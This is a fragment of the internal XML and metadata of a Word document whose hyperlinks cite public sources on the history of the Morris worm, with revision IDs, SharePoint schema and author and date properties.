    <w:rsid w:val="00F91C4A"/>
    <w:rsid w:val="00F93C8D"/>
    <w:rsid w:val="00FA0E28"/>
    <w:rsid w:val="00FA2AEF"/>
    <w:rsid w:val="00FA3314"/>
    <w:rsid w:val="00FB5882"/>
    <w:rsid w:val="00FB6CC3"/>
    <w:rsid w:val="00FC5D18"/>
    <w:rsid w:val="00FC764D"/>
    <w:rsid w:val="00FD72D2"/>
    <w:rsid w:val="00FE0697"/>
    <w:rsid w:val="00FE539C"/>
    <w:rsid w:val="00FE61B3"/>
    <w:rsid w:val="00FE7D70"/>
    <w:rsid w:val="00FF0493"/>
    <w:rsid w:val="00FF2D1B"/>
    <w:rsid w:val="00FF49AB"/>
    <w:rsid w:val="00FF49D8"/>
    <w:rsid w:val="0D95A8FE"/>
    <w:rsid w:val="0F9852A0"/>
    <w:rsid w:val="21D06ED1"/>
    <w:rsid w:val="25B0BC32"/>
    <w:rsid w:val="28E55423"/>
    <w:rsid w:val="30D7AE3D"/>
    <w:rsid w:val="3BE5853D"/>
    <w:rsid w:val="44BC7E4E"/>
    <w:rsid w:val="5DE66CCC"/>
    <w:rsid w:val="62C51C4D"/>
    <w:rsid w:val="759508FC"/>
    <w:rsid w:val="76CB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A7480C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{63A3B6AC-E23C-400A-A890-D90A118E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2A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2A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E22A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E22A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E22A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E22A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E22A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E22A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E22A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E22A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E2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2A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22A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E2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2A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E2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2A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E2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2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792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579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fbi.gov/history/famous-cases/morris-worm" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://alumni.cornell.edu/cornellians/morris-worm/" TargetMode="Externa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en.wikipedia.org/wiki/United_States_v._Morris_(1991)" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://limn.press/article/the-morris-worm/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www.cs.cmu.edu/afs/cs/academic/class/15213-s02/www/applications/recitation/recitation4/A/r04-A-4up.pdf" TargetMode="Externa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en.wikipedia.org/wiki/Robert_Tappan_Morris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www.sei.cmu.edu/history-of-innovation/fostering-growth-in-professional-cyber-incident-management/" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Morris_worm" TargetMode="External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hyperlink" Target="https://www.fbi.gov/news/stories/morris-worm-30-years-since-first-major-attack-on-internet-110218" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rapid7.com/blog/post/2019/01/02/the-ghost-of-exploits-past-a-deep-dive-into-the-morris-worm/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fe8ce6-9431-41f7-8b74-8d44d6ec421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E1B33B300424409C2E3CD3AC0F5F17" ma:contentTypeVersion="9" ma:contentTypeDescription="Crée un document." ma:contentTypeScope="" ma:versionID="d50cfc1f218d3e128910e559a7094a18">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="29fe8ce6-9431-41f7-8b74-8d44d6ec4219" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="aa56038a6756e20519cc8f34641b806c" ns3:_="">
    <xsd:import namespace="29fe8ce6-9431-41f7-8b74-8d44d6ec421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e8ce6-9431-41f7-8b74-8d44d6ec421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D67B7E-6C02-47B5-88AB-2934003CC039}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="29fe8ce6-9431-41f7-8b74-8d44d6ec4219"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{1C989DA9-58A1-48BA-A796-710260844C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EDA794-8E9F-4F8C-BE79-27489930AF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fe8ce6-9431-41f7-8b74-8d44d6ec42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Piotr GRABIEC</dc:creator>
  <keywords/>
  <dc:description/>
  <lastModifiedBy>Piotr GRABIEC</lastModifiedBy>
  <revision>3</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-04-09T08:28:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-15T20:07:10.0696655Z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2026-04-09T08:34:15Z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e71efc07-bfd9-4fda-b30c-2931d7dbb29e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  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="ContentTypeId">
    <vt:lpwstr>0x0101003BE1B33B300424409C2E3CD3AC0F5F17</vt:lpwstr>
  </property>
</Properties>
</file>